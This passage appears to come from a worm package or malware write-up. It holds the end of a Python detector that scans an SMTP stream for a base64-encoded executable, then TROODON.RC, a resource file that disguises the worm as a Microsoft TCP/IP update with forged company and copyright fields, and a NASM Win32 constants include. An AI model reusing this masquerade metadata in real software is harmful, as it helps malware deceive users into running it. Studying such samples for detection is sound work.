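    b"\r\n"
    + base64.b64encode(FAKE_PE) + b"\r\n"
    b"--B1--\r\n"
    b".\r\n"
    b"QUIT\r\n"
)

if __name__ == "__main__":
    mailtype, parts = scan_stream(SAMPLE_STREAM)
    print("worm mailtype:", mailtype, "executable parts:", parts)
```

Because the worm rewrites the stream below the mail client, the sender's own outbox never shows the attachment; the check has to run on the wire or at the relay.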
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[TROODON.RC]ÄÄÄ
#define IDI_ICON 100
IDI_ICON ICON <v.ico>
1 VERSIONINFO
FILEVERSION 1,0,0,0
PRODUCTVERSION 1,0,0,0
FILEFLAGSMASK 0x0000003FL
FILEFLAGS 0x0000000BL
FILEOS 0x00010001L
FILETYPE 0x00000001L
FILESUBTYPE 0x00000000L
BEGIN
BLOCK "StringFileInfo"
BEGIN
BLOCK "040904E4"
BEGIN
VALUE "FileDescription","TCP/IP Update for Microsoft Windows 95/98\0"
VALUE "FileVersion", "6.6.6\0"
VALUE "LegalCopyright", "Copyright (C) Microsoft Corp. 1999-2000\0"
VALUE "CompanyName", "Microsoft Corporation\0"
VALUE "InternalName","TCPIPUPD\0"
VALUE "OriginalFilename", "TCPIPUPD.EXE\0"
VALUE "ProductName","Microsoft(R) Windows NT(R) Operating System\0"
VALUE "ProductVersion", "6.6.6\0"
END
END
BLOCK "VarFileInfo"
BEGIN
VALUE "Translation", 0x0409,1252
END
END
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[TROODON.RC]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[WIN32N.INC]ÄÄÄ
; Win32.inc for NASM 1999 version 0.06 by Tamas Kaproncai [tomcat@szif.hu]
;-----------------------------data types----------------------------------
%define ACHAR BYTE ;ansi character
%define ATOM DWORD ;string atom
%define BOOL DWORD ;boolean variable
%define COLORREF DWORD ;rgb color
%define DWORDLONG QWORD ;long double word
%define GLOBALHANDLE DWORD ;global handle
%define HACCEL DWORD ;accelerator handle
%define HANDLE DWORD ;unspecified handle
%define HBITMAP DWORD ;bitmap handle
%define HBRUSH DWORD ;brush handle
%define HCOLORSPACE DWORD ;color space handle
%define HCURSOR DWORD ;cursor handle
%define HDC DWORD ;device context handle
%define HDWP DWORD ;defer win pos handle
%define HENHMETAFILE DWORD ;enh. metafile handle
%define HFILE DWORD ;file handle
%define HFONT DWORD ;font handle
%define HGLOBAL DWORD ;global handle
%define HHOOK DWORD ;hook handle
%define HICON DWORD ;icon handle
%define HINSTANCE DWORD ;instance handle
%define HINTERNET DWORD ;internet handle
%define HLOCAL DWORD ;local handle
%define HMENU DWORD ;menu handle
%define HMETAFILE DWORD ;metafile handle
%define HPALETTE DWORD ;palette handle
%define HPEN DWORD ;pen handle
%define HRGN DWORD ;region handle
%define HRSRC DWORD ;resource handle
%define HSTR DWORD ;string handle
%define HTASK DWORD ;task handle
%define HTREEITEM DWORD ;tree view item handle
%define HWND DWORD ;window handle
%define INTEGER DWORD ;standard integer
%define LOCALHANDLE DWORD ;local handle
%define LONG DWORD ;long integer
%define LONGINT DWORD ;long integer
%define LPARAM DWORD ;long parameter
%define LPBOOL DWORD ;long ptr to boolean
%define LPBYTE DWORD ;long ptr to byte
%define LPCSTR DWORD ;long ptr to string
%define LPCTSTR DWORD ;long ptr to string
%define LPCVOID DWORD ;long ptr to buffer
%define LPDWORD DWORD ;long ptr to dword
%define LPFN DWORD ;long ptr to function
%define LPINT DWORD ;long ptr to integer
%define LPLONG DWORD ;long ptr to long int
%define LPMSG DWORD ;long pointer to message
%define LPPAINTSTRUCT DWORD ;long pointer to paint structure
%define LPRECT DWORD ;long pointer to rectangle
%define LPSTR DWORD ;long ptr to string
%define LPTSTR DWORD ;long ptr to string
%define LPVOID DWORD ;long ptr to buffer
%define LPWORD DWORD ;long ptr to word
%define LRESULT DWORD ;long result
%define POINTER DWORD ;pointer to anything
%define PVOID DWORD ;pointer to buffer
%define SHORTINT WORD ;short integer
%define UINT DWORD ;unsigned integer
%define WCHAR WORD ;unicode character
%define WNDPROC DWORD ;window procedure
%define WPARAM DWORD ;word parameter
;-------------------------WindowProc macros-------------------------------
%MACRO StartWindowProc 0
PUSH EBP
MOV EBP,ESP
%DEFINE hwnd EBP+8
%DEFINE uMsg EBP+12
%DEFINE wParam EBP+16
%DEFINE lParam EBP+20
%ENDMACRO
%MACRO EndWindowProc 0
POP EBP
RETN 16
%ENDMACRO
;-------------------------win32api equates-------------------------------
WINAPI equ 1
TRUE equ 1
FALSE equ 0
NULL equ 0
Normal equ 000000h
ReadOnly equ 000001h
Hidden equ 000010h
System equ 000100h
vLabel equ 001000h
SubDir equ 010000h
Archive equ 100000h
Black equ 000000h
Blue equ 0FF0000h
Green equ 00FF00h
Cyan equ 0FFFF00h
Red equ 0000FFh
Magenta equ 0FF00FFh
Yellow equ 00FFFFh
White equ 0FFFFFFh
Gray equ 080808h
ANYSIZE_ARRAY equ 1
INVALID_HANDLE_VALUE equ -1
DELETE equ 10000h
READ_CONTROL equ 20000h
WRITE_DAC equ 40000h
WRITE_OWNER equ 80000h
SYNCHRONIZE equ 100000h
STANDARD_RIGHTS_READ equ READ_CONTROL
STANDARD_RIGHTS_WRITE equ READ_CONTROL
STANDARD_RIGHTS_EXECUTE equ READ_CONTROL
STANDARD_RIGHTS_REQUIRED equ 0F0000h
STANDARD_RIGHTS_ALL equ 1F0000h
SPECIFIC_RIGHTS_ALL equ 0FFFFh
SID_REVISION equ 1
SID_MAX_SUB_AUTHORITIES equ 15
SID_RECOMMENDED_SUB_AUTHORITIES equ 1
SidTypeUser equ 1
SidTypeGroup equ 2
SidTypeDomain equ 3
SidTypeAlias equ 4
SidTypeWellKnownGroup equ 5
SidTypeDeletedAccount equ 6
SidTypeInvalid equ 7
SidTypeUnknown equ 8
SECURITY_NULL_RID equ 0h
SECURITY_WORLD_RID equ 0h
SECURITY_LOCAL_RID equ 0h
SECURITY_CREATOR_OWNER_RID equ 0h
SECURITY_CREATOR_GROUP_RID equ 1h
SECURITY_DIALUP_RID equ 1h
SECURITY_NETWORK_RID equ 2h
SECURITY_BATCH_RID equ 3h
SECURITY_INTERACTIVE_RID equ 4h
SECURITY_SERVICE_RID equ 6h
SECURITY_ANONYMOUS_LOGON_RID equ 7h
SECURITY_LOGON_IDS_RID equ 5h
SECURITY_LOCAL_SYSTEM_RID equ 12h
SECURITY_NT_NON_UNIQUE equ 15h
SECURITY_BUILTIN_DOMAIN_RID equ 20h
DOMAIN_USER_RID_ADMIN equ 1F4h
DOMAIN_USER_RID_GUEST equ 1F5h
DOMAIN_GROUP_RID_ADMINS equ 200h
DOMAIN_GROUP_RID_USERS equ 201h
DOMAIN_GROUP_RID_GUESTS equ 202h
DOMAIN_ALIAS_RID_ADMINS equ 220h
DOMAIN_ALIAS_RID_USERS equ 221h
DOMAIN_ALIAS_RID_GUESTS equ 222h
DOMAIN_ALIAS_RID_POWER_USERS equ 223h
DOMAIN_ALIAS_RID_ACCOUNT_OPS equ 224h
DOMAIN_ALIAS_RID_SYSTEM_OPS equ 225h
DOMAIN_ALIAS_RID_PRINT_OPS equ 226h
DOMAIN_ALIAS_RID_BACKUP_OPS equ 227h
DOMAIN_ALIAS_RID_REPLICATOR equ 228h
SE_GROUP_MANDATORY equ 1h
SE_GROUP_ENABLED_BY_DEFAULT equ 2h
SE_GROUP_ENABLED equ 4h
SE_GROUP_OWNER equ 8h
SE_GROUP_LOGON_ID equ 0C0000000h
FILE_BEGIN equ 0
FILE_CURRENT equ 1
FILE_END equ 2
FILE_FLAG_WRITE_THROUGH equ 80000000h
FILE_FLAG_OVERLAPPED equ 40000000h
FILE_FLAG_NO_BUFFERING equ 20000000h
FILE_FLAG_RANDOM_ACCESS equ 10000000h
FILE_FLAG_SEQUENTIAL_SCAN equ 8000000h
FILE_FLAG_DELETE_ON_CLOSE equ 4000000h
FILE_FLAG_BACKUP_SEMANTICS equ 2000000h
FILE_FLAG_POSIX_SEMANTICS equ 1000000h
CREATE_NEW equ 1
CREATE_ALWAYS equ 2
OPEN_EXISTING equ 3
OPEN_ALWAYS equ 4
TRUNCATE_EXISTING equ 5
PIPE_ACCESS_INBOUND equ 1h
PIPE_ACCESS_OUTBOUND equ 2h
PIPE_ACCESS_DUPLEX equ 3h
PIPE_CLIENT_END equ 0h
PIPE_SERVER_END equ 1h
PIPE_WAIT equ 0h
PIPE_NOWAIT equ 1h
PIPE_READMODE_BYTE equ 0h
PIPE_READMODE_MESSAGE equ 2h
PIPE_TYPE_BYTE equ 0h
PIPE_TYPE_MESSAGE equ 4h
PIPE_UNLIMITED_INSTANCES equ 255
SECURITY_CONTEXT_TRACKING equ 40000h
SECURITY_EFFECTIVE_ONLY equ 80000h
SECURITY_SQOS_PRESENT equ 100000h
SECURITY_VALID_SQOS_FLAGS equ 1F0000h
SP_SERIALCOMM equ 1h
PST_UNSPECIFIED equ 0h
PST_RS232 equ 1h
PST_PARALLELPORT equ 2h
PST_RS422 equ 3h
PST_RS423 equ 4h
PST_RS449 equ 5h
PST_FAX equ 21h
PST_SCANNER equ 22h
PST_NETWORK_BRIDGE equ 100h
PST_LAT equ 101h
PST_TCPIP_TELNET equ 102h
PST_X25 equ 103h
PCF_DTRDSR equ 1h
PCF_RTSCTS equ 2h
PCF_RLSD equ 4h
PCF_PARITY_CHECK equ 8h
PCF_XONXOFF equ 10h
PCF_SETXCHAR equ 20h
PCF_TOTALTIMEOUTS equ 40h
PCF_INTTIMEOUTS equ 80h
PCF_SPECIALCHARS equ 100h
PCF_16BITMODE equ 200h
DLL_PROCESS_DETACH equ 0
DLL_PROCESS_ATTACH equ 1
DLL_THREAD_ATTACH equ 2
DLL_THREAD_DETACH equ 3
SP_PARITY equ 1h
SP_BAUD equ 2h
SP_DATABITS equ 4h
SP_STOPBITS equ 8h
SP_HANDSHAKING equ 10h
SP_PARITY_CHECK equ 20h
SP_RLSD equ 40h
BAUD_075 equ 1h
BAUD_110 equ 2h
BAUD_134_5 equ 4h
BAUD_150 equ 8h
BAUD_300 equ 10h
BAUD_600 equ 20h
BAUD_1200 equ 40h
BAUD_1800 equ 80h
BAUD_2400 equ 100h
BAUD_4800 equ 200h
BAUD_7200 equ 400h
BAUD_9600 equ 800h
BAUD_14400 equ 1000h
BAUD_19200 equ 2000h
BAUD_38400 equ 4000h
BAUD_56K equ 8000h
BAUD_128K equ 10000h
BAUD_115200 equ 20000h
BAUD_57600 equ 40000h
BAUD_USER equ 10000000h
DATABITS_5 equ 1h
DATABITS_6 equ 2h
DATABITS_7 equ 4h
DATABITS_8 equ 8h
DATABITS_16 equ 10h
DATABITS_16X equ 20h
STOPBITS_10 equ 1h
STOPBITS_15 equ 2h
STOPBITS_20 equ 4h
PARITY_NONE equ 100h
PARITY_ODD equ 200h
PARITY_EVEN equ 400h
PARITY_MARK equ 800h
PARITY_SPACE equ 1000h
DTR_CONTROL_DISABLE equ 0h
DTR_CONTROL_ENABLE equ 1h
DTR_CONTROL_HANDSHAKE equ 2h
RTS_CONTROL_DISABLE equ 0h
RTS_CONTROL_ENABLE equ 1h
RTS_CONTROL_HANDSHAKE equ 2h
RTS_CONTROL_TOGGLE equ 3h
GMEM_FIXED equ 0h
GMEM_MOVEABLE equ 2h
GMEM_NOCOMPACT equ 10h
GMEM_NODISCARD equ 20h
GMEM_ZEROINIT equ 40h
GMEM_MODIFY equ 80h
GMEM_DISCARDABLE equ 100h
GMEM_NOT_BANKED equ 1000h
GMEM_SHARE equ 2000h
GMEM_DDESHARE equ 2000h
GMEM_NOTIFY equ 4000h
GMEM_LOWER equ GMEM_NOT_BANKED
GMEM_VALID_FLAGS equ 7F72h
GMEM_INVALID_HANDLE equ 8000h
GMEM_DISCARDED equ 4000h
GMEM_LOCKCOUNT equ 0FFh
GHND equ GMEM_MOVEABLE|GMEM_ZEROINIT
GPTR equ GMEM_FIXED|GMEM_ZEROINIT
LMEM_FIXED equ 0h
LMEM_MOVEABLE equ 2h
LMEM_NOCOMPACT equ 10h
LMEM_NODISCARD equ 20h
LMEM_ZEROINIT equ 40h
LMEM_MODIFY equ 80h
LMEM_DISCARDABLE equ 0F00h
LMEM_VALID_FLAGS equ 0F72h
LMEM_INVALID_HANDLE equ 8000h
LHND equ LMEM_MOVEABLE+LMEM_ZEROINIT
LPTR equ LMEM_FIXED+LMEM_ZEROINIT
NONZEROLHND equ LMEM_MOVEABLE
NONZEROLPTR equ LMEM_FIXED
LMEM_DISCARDED equ 4000h
LMEM_LOCKCOUNT equ 0FFh
DEBUG_PROCESS equ 1h
DEBUG_ONLY_THIS_PROCESS equ 2h
CREATE_SUSPENDED equ 4h
DETACHED_PROCESS equ 8h
CREATE_NEW_CONSOLE equ 10h
NORMAL_PRIORITY_CLASS equ 20h
IDLE_PRIORITY_CLASS equ 40h
HIGH_PRIORITY_CLASS equ 80h
REALTIME_PRIORITY_CLASS equ 100h
CREATE_NEW_PROCESS_GROUP equ 200h
CREATE_NO_WINDOW equ 8000000h
PROFILE_USER equ 10000000h
PROFILE_KERNEL equ 20000000h
PROFILE_SERVER equ 40000000h
MAXLONG equ 7FFFFFFFh
THREAD_BASE_PRIORITY_MIN equ -2
THREAD_BASE_PRIORITY_MAX equ 2
THREAD_BASE_PRIORITY_LOWRT equ 15
THREAD_BASE_PRIORITY_IDLE equ -15
THREAD_PRIORITY_LOWEST equ THREAD_BASE_PRIORITY_MIN
THREAD_PRIORITY_BELOW_NORMAL equ THREAD_PRIORITY_LOWEST+1
THREAD_PRIORITY_NORMAL equ 0
THREAD_PRIORITY_HIGHEST equ THREAD_BASE_PRIORITY_MAX
THREAD_PRIORITY_ABOVE_NORMAL equ THREAD_PRIORITY_HIGHEST-1
THREAD_PRIORITY_ERROR_RETURN equ MAXLONG
THREAD_PRIORITY_TIME_CRITICAL equ THREAD_BASE_PRIORITY_LOWRT
THREAD_PRIORITY_IDLE equ THREAD_BASE_PRIORITY_IDLE
APPLICATION_ERROR_MASK equ 20000000h
ERROR_SEVERITY_SUCCESS equ 0h
ERROR_SEVERITY_INFORMATIONAL equ 40000000h
ERROR_SEVERITY_WARNING equ 80000000h
ERROR_SEVERITY_ERROR equ 0C0000000h
MINCHAR equ 80h
MAXCHAR equ 7Fh
MINSHORT equ 8000h
MAXSHORT equ 7FFFh
MINLONG equ 80000000h
MAXBYTE equ 0FFh
MAXWORD equ 0FFFFh
MAXDWORD equ 0FFFFFFFFh
LANG_NEUTRAL equ 0h
LANG_BULGARIAN equ 2h
LANG_CHINESE equ 4h
LANG_CROATIAN equ 1Ah
LANG_CZECH equ 5h
LANG_DANISH equ 6h
LANG_DUTCH equ 13h
LANG_ENGLISH equ 9h
LANG_FINNISH equ 0Bh
LANG_FRENCH equ 0Ch
LANG_GERMAN equ 7h
LANG_GREEK equ 8h
LANG_HUNGARIAN equ 0Eh
LANG_ICELANDIC equ 0Fh
LANG_ITALIAN equ 10h
LANG_JAPANESE equ 11h
LANG_KOREAN equ 12h
LANG_NORWEGIAN equ 14h
LANG_POLISH equ 15h
LANG_PORTUGUESE equ 16h
LANG_ROMANIAN equ 18h
LANG_RUSSIAN equ 19h
LANG_SLOVAK equ 1Bh
LANG_SLOVENIAN equ 24h
LANG_SPANISH equ 0Ah
LANG_SWEDISH equ 1Dh
LANG_TURKISH equ 1Fh
SUBLANG_NEUTRAL equ 0h
SUBLANG_DEFAULT equ 1h
SUBLANG_SYS_DEFAULT equ 2h
SUBLANG_CHINESE_TRADITIONAL equ 1h
SUBLANG_CHINESE_SIMPLIFIED equ 2h
SUBLANG_CHINESE_HONGKONG equ 3h
SUBLANG_CHINESE_SINGAPORE equ 4h
SUBLANG_DUTCH equ 1h
SUBLANG_DUTCH_BELGIAN equ 2h
SUBLANG_ENGLISH_US equ 1h
SUBLANG_ENGLISH_UK equ 2h
SUBLANG_ENGLISH_AUS equ 3h
SUBLANG_ENGLISH_CAN equ 4h
SUBLANG_ENGLISH_NZ equ 5h
SUBLANG_ENGLISH_EIRE equ 6h
SUBLANG_FRENCH equ 1h
SUBLANG_FRENCH_BELGIAN equ 2h
SUBLANG_FRENCH_CANADIAN equ 3h
SUBLANG_FRENCH_SWISS equ 4h
SUBLANG_GERMAN equ 1h
SUBLANG_GERMAN_SWISS equ 2h
SUBLANG_GERMAN_AUSTRIAN equ 3h
SUBLANG_ITALIAN equ 1h
SUBLANG_ITALIAN_SWISS equ 2h
SUBLANG_NORWEGIAN_BOKMAL equ 1h
SUBLANG_NORWEGIAN_NYNORSK equ 2h
SUBLANG_PORTUGUESE equ 2h
SUBLANG_PORTUGUESE_BRAZILIAN equ 1h
SUBLANG_SPANISH equ 1h
SUBLANG_SPANISH_MEXICAN equ 2h
SUBLANG_SPANISH_MODERN equ 3h
SORT_DEFAULT equ 0h
SORT_JAPANESE_XJIS equ 0h
SORT_JAPANESE_UNICODE equ 1h
SORT_CHINESE_BIG5 equ 0h
SORT_CHINESE_UNICODE equ 1h
SORT_KOREAN_KSC equ 0h
SORT_KOREAN_UNICODE equ 1h
FILE_READ_DATA equ 1h
FILE_LIST_DIRECTORY equ 1h
FILE_WRITE_DATA equ 2h
FILE_ADD_FILE equ 2h
FILE_APPEND_DATA equ 4h
FILE_ADD_SUBDIRECTORY equ 4h
FILE_CREATE_PIPE_INSTANCE equ 4h
FILE_READ_EA equ 8h
FILE_READ_PROPERTIES equ FILE_READ_EA
FILE_WRITE_EA equ 10h
FILE_WRITE_PROPERTIES equ FILE_WRITE_EA
FILE_EXECUTE equ 20h
FILE_TRAVERSE equ 20h
FILE_DELETE_CHILD equ 40h
FILE_READ_ATTRIBUTES equ 80h
FILE_WRITE_ATTRIBUTES equ 100h
FILE_ALL_ACCESS equ STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|1FFh
FILE_GENERIC_READ equ STANDARD_RIGHTS_READ|FILE_READ_DATA|FILE_READ_ATTRIBUTES|FILE_READ_EA|SYNCHRONIZE
FILE_GENERIC_WRITE equ STANDARD_RIGHTS_WRITE|FILE_WRITE_DATA|FILE_WRITE_ATTRIBUTES|FILE_WRITE_EA|FILE_APPEND_DATA|SYNCHRONIZE
FILE_GENERIC_EXECUTE equ STANDARD_RIGHTS_EXECUTE|FILE_READ_ATTRIBUTES|FILE_EXECUTE|SYNCHRONIZE
FILE_SHARE_READ equ 1h
FILE_SHARE_WRITE equ 2h
FILE_ATTRIBUTE_READONLY equ 1h
FILE_ATTRIBUTE_HIDDEN equ 2h
FILE_ATTRIBUTE_SYSTEM equ 4h
FILE_ATTRIBUTE_DIRECTORY equ 10h
FILE_ATTRIBUTE_ARCHIVE equ 20h
FILE_ATTRIBUTE_NORMAL equ 80h
FILE_ATTRIBUTE_TEMPORARY equ 100h
FILE_ATTRIBUTE_COMPRESSED equ 800h
FILE_NOTIFY_CHANGE_FILE_NAME equ 1h
FILE_NOTIFY_CHANGE_DIR_NAME equ 2h
FILE_NOTIFY_CHANGE_ATTRIBUTES equ 4h
FILE_NOTIFY_CHANGE_SIZE equ 8h
FILE_NOTIFY_CHANGE_LAST_WRITE equ 10h
FILE_NOTIFY_CHANGE_SECURITY equ 100h
MAILSLOT_NO_MESSAGE equ -1
MAILSLOT_WAIT_FOREVER equ -1
FILE_CASE_SENSITIVE_SEARCH equ 1h
FILE_CASE_PRESERVED_NAMES equ 2h
FILE_UNICODE_ON_DISK equ 4h
FILE_PERSISTENT_ACLS equ 8h
FILE_FILE_COMPRESSION equ 10h
FILE_VOLUME_IS_COMPRESSED equ 8000h
IO_COMPLETION_MODIFY_STATE equ 2h
IO_COMPLETION_ALL_ACCESS equ STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|3h
DUPLICATE_CLOSE_SOURCE equ 1h
DUPLICATE_SAME_ACCESS equ 2h
ACCESS_SYSTEM_SECURITY equ 1000000h
MAXIMUM_ALLOWED equ 2000000h
GENERIC_READ equ 80000000h
GENERIC_WRITE equ 40000000h
GENERIC_EXECUTE equ 20000000h
GENERIC_ALL equ 10000000h
ACL_REVISION equ 2
ACL_REVISION1 equ 1
ACL_REVISION2 equ 2
ACCESS_ALLOWED_ACE_TYPE equ 0h
ACCESS_DENIED_ACE_TYPE equ 1h
SYSTEM_AUDIT_ACE_TYPE equ 2h
SYSTEM_ALARM_ACE_TYPE equ 3h
HELPINFO_WINDOW equ 1
HELPINFO_MENUITEM equ 2
OBJECT_INHERIT_ACE equ 1h
CONTAINER_INHERIT_ACE equ 2h
NO_PROPAGATE_INHERIT_ACE equ 4h
INHERIT_ONLY_ACE equ 8h
VALID_INHERIT_FLAGS equ 0Fh
SUCCESSFUL_ACCESS_ACE_FLAG equ 40h
FAILED_ACCESS_ACE_FLAG equ 80h
AclRevisionInformation equ 1
AclSizeInformation equ 2
SECURITY_DESCRIPTOR_REVISION equ 1
SECURITY_DESCRIPTOR_REVISION1 equ 1
SECURITY_DESCRIPTOR_MIN_LENGTH equ 20
SE_OWNER_DEFAULTED equ 1h
SE_GROUP_DEFAULTED equ 2h
SE_DACL_PRESENT equ 4h
SE_DACL_DEFAULTED equ 8h
SE_SACL_PRESENT equ 10h
SE_SACL_DEFAULTED equ 20h
SE_SELF_RELATIVE equ 8000h
SE_PRIVILEGE_ENABLED_BY_DEFAULT equ 1h
SE_PRIVILEGE_ENABLED equ 2h
SE_PRIVILEGE_USED_FOR_ACCESS equ 80000000h
PRIVILEGE_SET_ALL_NECESSARY equ 1
SecurityAnonymous equ 1
SecurityIdentification equ 2
REG_OPTION_RESERVED equ 0
REG_OPTION_NON_VOLATILE equ 0
REG_OPTION_VOLATILE equ 1
REG_OPTION_CREATE_LINK equ 2
REG_OPTION_BACKUP_RESTORE equ 4
REG_NONE equ 0
REG_SZ equ 1
REG_EXPAND_SZ equ 2
REG_BINARY equ 3
REG_DWORD equ 4
REG_DWORD_LITTLE_ENDIAN equ 4
REG_DWORD_BIG_ENDIAN equ 5
REG_LINK equ 6
REG_MULTI_SZ equ 7
REG_RESOURCE_LIST equ 8
REG_FULL_RESOURCE_DESCRIPTOR equ 9
REG_RESOURCE_REQUIREMENTS_LIST equ 10
REG_CREATED_NEW_KEY equ 1h
REG_OPENED_EXISTING_KEY equ 2h
REG_WHOLE_HIVE_VOLATILE equ 1h
REG_REFRESH_HIVE equ 2h
REG_NOTIFY_CHANGE_NAME equ 1h
REG_NOTIFY_CHANGE_ATTRIBUTES equ 2h
REG_NOTIFY_CHANGE_LAST_SET equ 4h
REG_NOTIFY_CHANGE_SECURITY equ 8h
REG_LEGAL_CHANGE_FILTER equ REG_NOTIFY_CHANGE_NAME|REG_NOTIFY_CHANGE_ATTRIBUTES|REG_NOTIFY_CHANGE_LAST_SET|REG_NOTIFY_CHANGE_SECURITY
REG_LEGAL_OPTION equ REG_OPTION_RESERVED|REG_OPTION_NON_VOLATILE|REG_OPTION_VOLATILE|REG_OPTION_CREATE_LINK|REG_OPTION_BACKUP_RESTORE
KEY_QUERY_VALUE equ 1h
KEY_SET_VALUE equ 2h
KEY_CREATE_SUB_KEY equ 4h
KEY_ENUMERATE_SUB_KEYS equ 8h
KEY_NOTIFY equ 10h
KEY_CREATE_LINK equ 20h
KEY_READ equ (STANDARD_RIGHTS_READ|KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY)&(-1-SYNCHRONIZE) ; OR group masked with ~SYNCHRONIZE
KEY_WRITE equ (STANDARD_RIGHTS_WRITE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|SYNCHRONIZE)&(-1-SYNCHRONIZE) ; OR group masked with ~SYNCHRONIZE
KEY_EXECUTE equ KEY_READ
KEY_ALL_ACCESS equ (STANDARD_RIGHTS_ALL|KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|KEY_CREATE_LINK)&(-1-SYNCHRONIZE) ; OR group masked with ~SYNCHRONIZE
EXCEPTION_DEBUG_EVENT equ 1
CREATE_THREAD_DEBUG_EVENT equ 2
CREATE_PROCESS_DEBUG_EVENT equ 3
EXIT_THREAD_DEBUG_EVENT equ 4
EXIT_PROCESS_DEBUG_EVENT equ 5
LOAD_DLL_DEBUG_EVENT equ 6
UNLOAD_DLL_DEBUG_EVENT equ 7
OUTPUT_DEBUG_STRING_EVENT equ 8
RIP_EVENT equ 9
EXCEPTION_MAXIMUM_PARAMETERS equ 15
DRIVE_REMOVABLE equ 2
DRIVE_FIXED equ 3
DRIVE_REMOTE equ 4
DRIVE_CDROM equ 5
DRIVE_RAMDISK equ 6
FILE_TYPE_UNKNOWN equ 0h
FILE_TYPE_DISK equ 1h
FILE_TYPE_CHAR equ 2h
FILE_TYPE_PIPE equ 3h
FILE_TYPE_REMOTE equ 8000h
STD_INPUT_HANDLE equ -10
STD_OUTPUT_HANDLE equ -11
STD_ERROR_HANDLE equ -12
NOPARITY equ 0
ODDPARITY equ 1
EVENPARITY equ 2
MARKPARITY equ 3
SPACEPARITY equ 4
ONESTOPBIT equ 0
ONE5STOPBITS equ 1
TWOSTOPBITS equ 2
IGNORE equ 0
INFINITE equ 0FFFFFFFFh ; full 32-bit -1: wait forever, not 65535 ms
CBR_110 equ 110
CBR_300 equ 300
CBR_600 equ 600
CBR_1200 equ 1200
CBR_2400 equ 2400
CBR_4800 equ 4800
CBR_9600 equ 9600
CBR_14400 equ 14400
CBR_19200 equ 19200
CBR_38400 equ 38400
CBR_56000 equ 56000
CBR_57600 equ 57600
CBR_115200 equ 115200
CBR_128000 equ 128000
CBR_256000 equ 256000
CE_RXOVER equ 1h
CE_OVERRUN equ 2h
CE_RXPARITY equ 4h
CE_FRAME equ 8h
CE_BREAK equ 10h
CE_TXFULL equ 100h
CE_PTO equ 200h
CE_IOE equ 400h
CE_DNS equ 800h
CE_OOP equ 1000h
CE_MODE equ 8000h
IE_BADID equ -1
IE_OPEN equ -2
IE_NOPEN equ -3
IE_MEMORY equ -4
IE_DEFAULT equ -5
IE_HARDWARE equ -10
IE_BYTESIZE equ -11
IE_BAUDRATE equ -12
EV_RXCHAR equ 1h
EV_RXFLAG equ 2h
EV_TXEMPTY equ 4h
EV_CTS equ 8h
EV_DSR equ 10h
EV_RLSD equ 20h
EV_BREAK equ 40h
EV_ERR equ 80h
EV_RING equ 100h
EV_PERR equ 200h
EV_RX80FULL equ 400h
EV_EVENT1 equ 800h
EV_EVENT2 equ 1000h
SETXOFF equ 1
SETXON equ 2
SETRTS equ 3
CLRRTS equ 4
SETDTR equ 5
CLRDTR equ 6
RESETDEV equ 7
SETBREAK equ 8
CLRBREAK equ 9
PURGE_TXABORT equ 1h
PURGE_RXABORT equ 2h
PURGE_TXCLEAR equ 4h
PURGE_RXCLEAR equ 8h
LPTx equ 80h
MS_CTS_ON equ 10h
MS_DSR_ON equ 20h
MS_RING_ON equ 40h
MS_RLSD_ON equ 80h
S_QUEUEEMPTY equ 0
S_THRESHOLD equ 1
S_ALLTHRESHOLD equ 2
S_NORMAL equ 0
S_LEGATO equ 1
S_STACCATO equ 2
S_PERIOD512 equ 0
S_PERIOD1024 equ 1
S_PERIOD2048 equ 2
S_PERIODVOICE equ 3
S_WHITE512 equ 4
S_WHITE1024 equ 5
S_WHITE2048 equ 6
S_WHITEVOICE equ 7
S_SERDVNA equ -1
S_SEROFM equ -2
S_SERMACT equ -3
S_SERQFUL equ -4
S_SERBDNT equ -5
S_SERDLN equ -6
S_SERDCC equ -7
S_SERDTP equ -8
S_SERDVL equ -9
S_SERDMD equ -10
S_SERDSH equ -11
S_SERDPT equ -12
S_SERDFQ equ -13
S_SERDDR equ -14
S_SERDSR equ -15
S_SERDST equ -16
NMPWAIT_WAIT_FOREVER equ 0FFFFFFFFh ; full 32-bit -1
NMPWAIT_NOWAIT equ 1h
NMPWAIT_USE_DEFAULT_WAIT equ 0h
FS_CASE_IS_PRESERVED equ FILE_CASE_PRESERVED_NAMES
FS_CASE_SENSITIVE equ FILE_CASE_SENSITIVE_SEARCH
FS_UNICODE_STORED_ON_DISK equ FILE_UNICODE_ON_DISK
FS_PERSISTENT_ACLS equ FILE_PERSISTENT_ACLS
SECTION_QUERY equ 1h
SECTION_MAP_WRITE equ 2h
SECTION_MAP_READ equ 4h
SECTION_MAP_EXECUTE equ 8h
SECTION_EXTEND_SIZE equ 10h
SECTION_ALL_ACCESS equ STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_WRITE|SECTION_MAP_READ|SECTION_MAP_EXECUTE|SECTION_EXTEND_SIZE
FILE_MAP_COPY equ SECTION_QUERY
FILE_MAP_WRITE equ SECTION_MAP_WRITE
FILE_MAP_READ equ SECTION_MAP_READ
FILE_MAP_ALL_ACCESS equ SECTION_ALL_ACCESS
OF_READ equ 0h
OF_WRITE equ 1h
OF_READWRITE equ 2h
OF_SHARE_COMPAT equ 0h
OF_SHARE_EXCLUSIVE equ 10h
OF_SHARE_DENY_WRITE equ 20h
OF_SHARE_DENY_READ equ 30h
OF_SHARE_DENY_NONE equ 40h
OF_PARSE equ 100h
OF_DELETE equ 200h
OF_VERIFY equ 400h
OF_CANCEL equ 800h
OF_CREATE equ 1000h
